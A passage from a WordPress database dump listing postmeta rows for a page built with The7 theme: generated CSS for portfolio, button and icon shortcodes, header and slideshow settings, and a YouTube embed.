15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(19677,3063,'the7_shortcodes_dynamic_css','a:3:{s:32:\"9257017e3164acfe496e3c83a6227e7a\";s:185:\"#default-btn-9257017e3164acfe496e3c83a6227e7a.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-9257017e3164acfe496e3c83a6227e7a > i {\n  margin-right: 8px;\n}\n\";s:32:\"6d8ead28084f2f7cc7e24255d8bfbd9e\";s:185:\"#default-btn-6d8ead28084f2f7cc7e24255d8bfbd9e.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-6d8ead28084f2f7cc7e24255d8bfbd9e > i {\n  margin-right: 8px;\n}\n\";s:32:\"d90d528f09bfcbe57894150915174d20\";s:5761:\".icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon {\n  width: 60px;\n  height: 60px;\n  line-height: 60px;\n  font-size: 32px;\n  border-radius: 200px;\n  margin: 0px 0px 0px 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner {\n  min-width: 60px;\n  min-height: 60px;\n  border-radius: 200px;\n}\n@media all and (-ms-high-contrast: none) {\n  .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner {\n    height: 60px;\n  }\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .dt-hover-icon {\n  line-height: 60px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon:before,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon:after,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner:before,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon .icon-inner:after {\n  min-width: 100%;\n  min-height: 100%;\n  padding: inherit;\n  border-radius: inherit;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-width: 2px;\n  border-style: solid;\n}\n.dt-icon-border-dashed.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-style: dashed;\n}\n.dt-icon-border-dotted.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-style: dotted;\n}\n.dt-icon-border-double.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-on:before {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dashed.dt-icon-border-on:before {\n  border-style: dashed;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dotted.dt-icon-border-on:before {\n  border-style: dotted;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-double.dt-icon-border-on:before {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-border-on:after {\n  border-width: 2px;\n  border-style: solid;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dashed.dt-icon-hover-border-on:after {\n  border-style: dashed;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-dotted.dt-icon-hover-border-on:after {\n  border-style: dotted;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-border-double.dt-icon-hover-border-on:after {\n  border-style: double;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover {\n  font-size: 32px;\n}\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:hover .soc-icon {\n  color: #fff;\n  background: none;\n}\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-on:not(:hover) .soc-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-font-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-font-icon,\n#page .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-icon,\n#phantom .icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .text-icon.dt-icon-hover-off .soc-icon {\n  color: #ffffff;\n  background: none;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-1 {\n  grid-template-columns: 60px minmax(0,1fr);\n  grid-column-gap: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-2 {\n  grid-template-columns: minmax(0,1fr) 60px;\n  grid-column-gap: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-2 .text-icon {\n  margin-left: 0;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-3 {\n  grid-template-columns: 60px minmax(0,1fr);\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20.layout-3 .dt-text-title {\n  margin-left: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-title,\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-title a {\n  color: #eeee22;\n  background: none;\n  font-weight: bold;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-title {\n  margin-bottom: 0px;\n}\n.icon-with-text-shortcode.icon-text-id-d90d528f09bfcbe57894150915174d20 .dt-text-desc {\n  margin-bottom: 0px;\n}\n\";}'),
(19678,3063,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(19679,3063,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(19680,3063,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(19681,3063,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(19682,3063,'_wp_page_template','default'),
(19683,3063,'_wpb_vc_js_status','true'),
(19684,3063,'_dt_sidebar_position','disabled'),
(19685,3063,'_dt_sidebar_widgetarea_id','sidebar_1'),
(19686,3063,'_dt_sidebar_hide_on_mobile','0'),
(19687,3063,'_dt_footer_show','0'),
(19688,3063,'_dt_footer_widgetarea_id','give-forms-sidebar'),
(19689,3063,'_dt_footer_hide_on_mobile','1'),
(19690,3063,'_dt_header_title','slideshow'),
(19691,3063,'_dt_header_background','normal'),
(19692,3063,'_dt_header_background_below_slideshow','disabled'),
(19693,3063,'_dt_header_transparent_bg_color','#000000'),
(19694,3063,'_dt_header_transparent_bg_opacity','50'),
(19695,3063,'_dt_header_transparent_bg_color_scheme','light'),
(19696,3063,'_dt_slideshow_mode','revolution'),
(19697,3063,'_dt_slideshow_layout','fullwidth'),
(19698,3063,'_dt_slideshow_slider_proportions','a:2:{s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"500\";}'),
(19699,3063,'_dt_slideshow_scaling','fill'),
(19700,3063,'_dt_slideshow_autoplay','paused'),
(19701,3063,'_dt_slideshow_autoslide_interval','5000'),
(19702,3063,'_dt_slideshow_hide_captions','0'),
(19703,3063,'_dt_slideshow_photo_scroller_layout','fullscreen'),
(19704,3063,'_dt_slideshow_photo_scroller_bg_color','#000000'),
(19705,3063,'_dt_slideshow_photo_scroller_overlay','1'),
(19706,3063,'_dt_slideshow_photo_scroller_top_padding','0'),
(19707,3063,'_dt_slideshow_photo_scroller_bottom_padding','0'),
(19708,3063,'_dt_slideshow_photo_scroller_side_paddings','0'),
(19709,3063,'_dt_slideshow_photo_scroller_inactive_opacity','15'),
(19710,3063,'_dt_slideshow_photo_scroller_thumbnails_visibility','show'),
(19711,3063,'_dt_slideshow_photo_scroller_thumbnails_height','85'),
(19712,3063,'_dt_slideshow_photo_scroller_autoplay','play'),
(19713,3063,'_dt_slideshow_photo_scroller_autoplay_speed','4000'),
(19714,3063,'_dt_slideshow_photo_scroller_ls_max_width','100'),
(19715,3063,'_dt_slideshow_photo_scroller_ls_min_width','0'),
(19716,3063,'_dt_slideshow_photo_scroller_ls_fill_dt','fit'),
(19717,3063,'_dt_slideshow_photo_scroller_ls_fill_mob','fit'),
(19718,3063,'_dt_slideshow_photo_scroller_pt_max_width','100'),
(19719,3063,'_dt_slideshow_photo_scroller_pt_min_width','0'),
(19720,3063,'_dt_slideshow_photo_scroller_pt_fill_dt','fit'),
(19721,3063,'_dt_slideshow_photo_scroller_pt_fill_mob','fit'),
(19722,3063,'_dt_slideshow_revolution_slider','the7-software-company-slider'),
(19723,3063,'_dt_slideshow_layer_slider','none'),
(19724,3063,'_dt_slideshow_layer_show_bg_and_paddings','0'),
(19725,3063,'_dt_header_disabled_background','normal'),
(19726,3063,'_dt_header_disabled_transparent_bg_color','#000000'),
(19727,3063,'_oembed_f4fe2fa3a211d012858d7099685cac4c','<iframe width=\"1200\" height=\"900\" src=\"https://www.youtube.com/embed/KuVcuTYWPHE?feature=oembed\" frameborder=\"0\" allowfullscreen></iframe>'),
(19728,3063,'_oembed_time_f4fe2fa3a211d012858d7099685cac4c','1455271357'),
(19729,3063,'_dt_page_overrides_top_margin','0px'),
(19730,3063,'_dt_page_overrides_bottom_margin','0px'),
(19731,3063,'_dt_header_disabled_transparent_bg_opacity','50'),
(19732,3063,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(19733,3063,'_dt_header_transparent_top_bar_bg_opacity','25'),
(19734,3063,'_dt_slideshow_photo_scroller_thumbnails_width',''),
(19735,3063,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(19736,3063,'fake_id',''),
(19737,3063,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(19738,3063,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(19739,3063,'the7_shortcodes_inline_css','.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.classic-layout-list article {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on.classic-layout-list article {\r\n  margin-top: ;\r\n  padding-top: 0;\r\n  border-color: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on.classic-layout-list article:first-of-type {\r\n  margin-top: 0;\r\n  padding-top: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.classic-layout-list.mode-list .post-thumbnail-wrap {\r\n  width: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.classic-layout-list.mode-list .post-entry-content {\r\n  width: calc(100% - );\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.classic-layout-list.mode-list .no-img .post-entry-content {\r\n  width: 100%;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.bottom-overlap-layout-list .post-entry-content {\r\n  margin-top: -100px;\r\n  width: 75%;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.bottom-overlap-layout-list:not(.mode-list) .no-img .post-entry-content {\r\n  margin-top: 0;\r\n  width: 100%;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.bottom-overlap-layout-list.mode-list .no-img .post-entry-content {\r\n  margin-top: 0;\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.gradient-overlap-layout-list .post-entry-content {\r\n  background: linear-gradient(to bottom,#f7f7f7,#f7f7f7) no-repeat 0px 150px;\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.gradient-overlap-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,rgba(247,247,247,0.9) 64%,#f7f7f7 83%,#f7f7f7 100%);\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content {\r\n  background: #f7f7f7;\r\n  padding: 30px 30px 30px 30px;\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-bg-on.gradient-overlap-layout-list .no-img .post-entry-content:before {\r\n  display: none;\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list .post-entry-content {\r\n  background: #f7f7f7;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list:not(.portfolio-shortcode):not(.albums-shortcode) .post-entry-content {\r\n  top: 0px;\r\n  right: 0px;\r\n  bottom: 0px;\r\n  left: 0px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list .post-head-wrapper,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.gradient-overlay-layout-list .post-entry-wrapper {\r\n  right: 30px;\r\n  left: 30px;\r\n}\r\n#page .portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list .post-entry-content {\r\n  background: none;\r\n  padding: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list .post-entry-content:before {\r\n  background: #f7f7f7;\r\n  background: -moz-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: -webkit-linear-gradient(top,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n  background: linear-gradient(to bottom,rgba(247,247,247,0) 0%,#f7f7f7 65%,#f7f7f7 100%);\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list .post-entry-wrapper {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list .post-entry-wrapper {\r\n  bottom: -15px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list.meta-info-off .post-entry-wrapper {\r\n  bottom: -5px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list article:not(.description-off) .post-entry-wrapper {\r\n  bottom: -20px;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.content-rollover-layout-list:not(.disable-layout-hover) article:hover .post-entry-wrapper {\r\n  bottom: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .filter a,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .filter a * {\r\n  color: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .paginator a,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .paginator a * {\r\n  color: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa .filter-bg-decoration .filter-categories a.act {\r\n  color: #fff;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.mode-masonry) article {\r\n  margin-top: ;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.mode-masonry) article:first-of-type,\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa:not(.mode-masonry) article.visible.first {\r\n  margin-top: 0;\r\n}\r\n.portfolio-carousel-shortcode.portfolio-carousel-shortcode-id-7f7101c501acf248d43d1aa86a566efa.dividers-on:not(.mode-masonry) article {\r\n  margin-top: 0;\r\n  padding-top: 